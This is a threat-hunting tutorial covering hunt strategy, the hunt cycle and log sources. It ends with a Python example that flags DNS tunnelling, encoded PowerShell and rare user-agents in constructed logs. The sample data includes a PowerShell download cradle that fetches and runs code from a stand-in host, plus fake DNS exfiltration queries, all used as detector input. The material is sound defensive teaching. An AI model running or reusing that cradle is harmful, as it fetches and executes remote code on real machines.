Project Name: Cyber Threat Hunt cycle
Description: – Whenever an adversary changes its routine procedures to evade enterprise defenses, Cyber Threat Hunting plays a very important role in identifying such sophisticated attacks. To start with Cyber Threat Hunting we will first understand its cycle, which sets the stage for more detail on hunting.
Author: Rohit D Sadgune / Amruta Sadgune
FAQ: –
- Cyber Threat Hunt cycle
- Different hunting techniques
- Data Sources for Threat Hunting
- Threat Strategy consideration points
Primary Threat Hunting Strategy Questions
There are four important questions that shape a threat hunting strategy:
- What are you hunting?
Threat hunting is costly and uncertain. You must narrow down exactly which adversary activity you are hunting for. Is it exploitation? Is it lateral movement? Is it exfiltration?
- Where will you find it?
Narrow down where the primary traces of the adversary will be found, and build a proper hypothesis for that location.
- How will you find the adversary?
Once you have established the specific posture of the enterprise and which adversarial effects you are looking for, the next step is to choose appropriate solutions. Take on one threat at a time and map the adversarial effects to your threat intelligence.
- When will you find it?
Allocate a specific team and time to focus on one adversary. Put a time bound on your hunting; a never-ending chase will lead you nowhere.
Cyber Threat Hunt cycle
- Survey – Discover the entities in the enterprise environment, determine which entities an adversary is most likely to target, and plant sensors on those entities to monitor them and collect data on any malicious activity.
- Secure – Harden the monitored entities so that adversaries already in the environment are prevented from moving laterally and gaining further access. This phase also prevents new adversaries and other exploits from gaining a foothold.
- Detect – Leverage the threat hunt sensors to automate observation and data collection, find evidence of successful and failed attacks, and detect adversaries by analyzing the collected events.
- Respond – Terminate the attack by cutting off the adversary's access and preventing it from being regained, repair the damage to compromised entities, and inform the appropriate personnel of the actions taken by the threat hunters and the vulnerabilities that still need to be addressed.
Cyber Threat Hunting Building Blocks
- Hypothesis: – Cyber threat hunting starts by forming informed assumptions about the types of adversarial effects or activities that may be going on in your enterprise network.
- Analysis: – Identifying relationships between different data sets is an effective technique for putting events in an understandable context. This includes visual, statistical and machine learning based analysis.
- Deep Dive: – Discover new, malicious or suspicious patterns and follow the complete attack path to unveil the adversary's tactics, techniques and procedures.
- Analytics: – Information enriched with automated machine learning is key to successful threat hunting: it helps identify, investigate and report new attackers encountered during hunting.
Primary Log Sources for Threat Hunting
System logging:- OS logging of the system, consisting of system, application and security logs.
PowerShell logging:- Granular PowerShell logging (module, script block and transcription logging) to determine the exact nature and source of PowerShell executions, including the decoded content of encoded commands.
DNS logging:- Logging from DNS servers. It should contain as much information as possible, including source, requested record type and name, and size of request and response.
Web server logging:- Logging from web servers, including the request method (GET, PUT, etc.), user-agents, headers and size of the request.
Authentication logging:- Authentication logging from the enterprise, usually Active Directory (domain controller) logging.
End-point forensic information:- Processes currently running on end-points (servers and clients), with their parent process, command line and user.
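The following is an added example, not code from the original article, that ties the building blocks above (hypothesis, statistical analysis and correlation of data sets) to three of the log sources listed: DNS, PowerShell and web server logs. It starts from three hypotheses (DNS tunnelling for exfiltration, encoded PowerShell for execution, and a rare user-agent as a stacking outlier), runs each over constructed sample log lines, and then correlates the hits by source host. The log line formats, field layout, entropy and length thresholds, and the sample payload are all assumptions made for the example and will need adjusting to your own sources.

```python
"""Hypothesis-driven hunt over constructed DNS, PowerShell and web server
log lines (added example; formats and thresholds are assumptions, not
those of any specific product).

Hypotheses:
  1. Exfiltration: DNS tunnelling shows up as long, high-entropy labels.
  2. Execution: PowerShell run with -EncodedCommand hides its payload.
  3. Stacking: a user-agent seen only once in the web logs is an outlier.
Findings are then correlated by source host.
"""
import base64
import math
import re
from collections import Counter

# --- constructed sample data (not from a real environment) ---------------
DNS_LOG = [
    "2024-05-01T10:00:01Z 10.0.0.12 A www.example.com",
    "2024-05-01T10:00:02Z 10.0.0.12 A mail.example.com",
    "2024-05-01T10:00:03Z 10.0.0.45 TXT 4a7f9c2e1b8d3f6a0c5e9b2d7f1a4c8e.data.badhost.example",
    "2024-05-01T10:00:04Z 10.0.0.45 TXT 9e2c4b8a6f1d3e7c5a9b0d2f4e6a8c1b.data.badhost.example",
]
# A typical download cradle, encoded the way -EncodedCommand expects (UTF-16LE, base64).
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://badhost.example/a')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode()
PS_LOG = [
    "2024-05-01T10:01:00Z host=WS01 user=alice cmd=powershell.exe -NoProfile Get-Process",
    "2024-05-01T10:01:05Z host=WS02 user=bob cmd=powershell.exe -nop -w hidden -enc " + ENCODED,
]
WEB_LOG = [
    '10.0.0.12 "GET /index.html" 200 512 "Mozilla/5.0 (Windows NT 10.0) Firefox/125.0"',
    '10.0.0.13 "GET /index.html" 200 512 "Mozilla/5.0 (Windows NT 10.0) Firefox/125.0"',
    '10.0.0.45 "PUT /upload" 200 91234 "python-requests/2.31"',
]

DNS_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")                 # ts src type qname
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
WEB_RE = re.compile(r'^(\S+) "[^"]*" \d+ \d+ "([^"]*)"$')          # src ... user-agent


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character; hex/base64 blobs score far above words."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def hunt_dns_tunneling(lines, max_label_len=30, min_entropy=3.5):
    """Hypothesis 1: flag queries whose first label is long and high-entropy."""
    hits = []
    for line in lines:
        m = DNS_RE.match(line)
        if not m:
            continue
        _ts, src, _rtype, qname = m.groups()
        label = qname.split(".")[0]
        ent = shannon_entropy(label)
        if len(label) > max_label_len and ent >= min_entropy:
            hits.append({"src": src, "qname": qname, "entropy": round(ent, 2)})
    return hits


def hunt_encoded_powershell(lines):
    """Hypothesis 2: find -enc/-EncodedCommand and decode the hidden script."""
    hits = []
    for line in lines:
        m = ENC_RE.search(line)
        if not m:
            continue
        try:
            decoded = base64.b64decode(m.group(1)).decode("utf-16le")
        except (ValueError, UnicodeDecodeError):
            decoded = "<undecodable>"  # still worth a look: malformed on purpose?
        hits.append({"line": line, "decoded": decoded})
    return hits


def hunt_web_rare_user_agents(lines, max_count=1):
    """Hypothesis 3 (stacking): count user-agents; hosts using a rare one are leads."""
    parsed = [m.groups() for m in map(WEB_RE.match, lines) if m]
    counts = Counter(ua for _src, ua in parsed)
    return [{"src": src, "ua": ua} for src, ua in parsed if counts[ua] <= max_count]


def correlate(findings):
    """Relate data sets: hosts flagged by two or more hunts rise to the top."""
    seen = Counter()
    for hits in findings.values():
        for src in {h["src"] for h in hits if "src" in h}:
            seen[src] += 1
    return sorted(src for src, n in seen.items() if n >= 2)


def run_hunt():
    findings = {
        "dns_tunnelling": hunt_dns_tunneling(DNS_LOG),
        "encoded_powershell": hunt_encoded_powershell(PS_LOG),
        "rare_user_agent": hunt_web_rare_user_agents(WEB_LOG),
    }
    findings["correlated_hosts"] = correlate(findings)
    return findings


if __name__ == "__main__":
    for name, hits in run_hunt().items():
        print(f"== {name} ==")
        for h in hits if isinstance(hits, list) else [hits]:
            print("  ", h)
```

Each hunt answers one "what are you hunting?" question from the strategy section and stays time-bound by working over a fixed slice of logs; the correlation step is what turns three independent leads into a single host (the one that both tunnelled DNS and uploaded with an unusual client) worth a deep dive. Thresholds such as the 30-character label length are starting points to be tuned against a baseline of your own DNS traffic, otherwise CDN and anti-spam lookups will flood the results.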